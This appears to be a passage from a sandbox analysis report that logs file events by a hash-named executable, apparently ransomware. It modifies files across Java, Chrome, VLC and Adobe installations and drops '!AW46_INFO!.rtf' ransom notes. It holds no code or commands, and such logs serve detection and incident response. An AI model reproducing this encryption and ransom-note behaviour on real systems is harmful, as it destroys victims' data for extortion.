Files\Java\jdk1.7.0_80\jre\lib\zi\America\Indiana\Indianapolis 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoViewer.dll.mui 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Recife 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Yakutat 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Guam 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Indiana\Knox 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx.ja_5.5.0.165303.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Puerto_Rico 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Saipan 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\ImportRename.wdp 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.jsp.jasper_1.0.400.v20130327-1442.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-dialogs_ja.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\North_Dakota\Beulah 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rcp.application.zh_CN_5.5.0.165303.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.services.nl_zh_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Noumea 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.core.di.extensions_0.12.0.v20140417-2033.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jmc.exe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\de.pak 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\MST 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Edmonton 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-host-remote.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Cartridges\as90.xsl 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\META-INF\MANIFEST.MF 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.publisher.nl_ja_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\MST7MDT 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Dawson_Creek 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT+2 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-heapdump_zh_CN.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\bg\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT-13 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\uz\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\stopNetworkServer.bat 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Stockholm 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jps.exe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\ext\jhall-2.0_05.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\83.0.4103.106\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Guatemala 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Yekaterinburg 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\sunjce_provider.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.browser.jdp.zh_CN_5.5.0.165303.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\meta-index 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.jasper.glassfish_2.2.2.v201205150955.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.touchpoint.natives.nl_ja_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\bn\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-2 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT+9 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help.webapp.nl_zh_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Kentucky\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\fil.pak 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Havana 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy\messages.properties 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Jerusalem 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\cursors.properties 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\VERSION.txt 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64.nl_zh_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\ru\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\default_apps\docs.crx 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jre7\lib\deploy\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.views_3.7.0.v20140408-0703.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\diagnostic-command-16.png 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\anevia_streams.luac 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\epl-v10.html 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\META-INF\MANIFEST.MF 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.operations.nl_ja_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.addons.swt.nl_zh_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Antarctica\Macquarie 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Antarctica\Rothera 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Indiana\Marengo 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Pyongyang 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\core\locale\org-openide-filesystems_ja.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Winnipeg 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\ext\jaccess.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\SetupMetrics\20200616092700.pma 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Bahia_Banderas 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-jvm.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Kwajalein 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Port-au-Prince 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\feature.properties 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.swt.nl_ja_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.intro_3.4.200.v20130326-1254.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-H 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Javascripts\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Nauru 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\vlc.exe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-keyring-impl_ja.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Cartridges\as90.xsl 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Jamaica 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\css\blafdoc.css 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\javax.xml_1.3.4.v201005080400.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Enderbury 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZX______.PFB 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Minsk 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\AdobePiStd.otf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1253.TXT 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Tarawa 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\jfr.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.core.nl_zh_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-core.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\gimap.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\pt_BR\LC_MESSAGES\vlc.mo 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.director.nl_zh_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\Resource.zip 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ach\LC_MESSAGES\vlc.mo 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jrunscript.exe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\epl-v10.html 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-application-views_ja.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\send-email-16.png 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Chihuahua 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\win32_LinkNoDrop32x32.gif 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\lua\http\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Bold.otf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Auckland 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Mozilla Firefox\fonts\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ecf.provider.filetransfer.httpclient4.ssl_1.0.0.v20140827-1444.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyclient.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy\messages_sv.properties 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Tunis 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\El_Salvador 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.controlpanel.ui_5.5.0.165303.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\images\cursors\win32_MoveDrop32x32.gif 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT-7 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-keyring-impl_zh_CN.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.publisher_1.3.0.v20140911-0143.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\UTC 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\ffjcext.zip 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\setNetworkServerCP.bat 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\eclipse_update_120.jpg 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\resources.pak 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jre7\lib\zi\SystemV\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Indian\Mauritius 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT+6 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\javax.servlet_3.0.0.v201112011016.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\hy\LC_MESSAGES\vlc.mo 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\intf\dummy.luac 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_glass_100_f6f6f6_1x400.png 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\1423861261279.profile.gz 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.net_1.2.200.v20120807-0927.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Atlantic\Madeira 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Mozilla Firefox\plugin-hang-ui.exe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\ktab.exe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\MEIPreload\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Australia\Melbourne 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-api-annotations-common.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Gibraltar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\EmptyDatabase.zip 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.jarprocessor_1.0.300.v20131211-1531.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Luxembourg 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Guadalcanal 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\xjc.exe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Scoresbysund 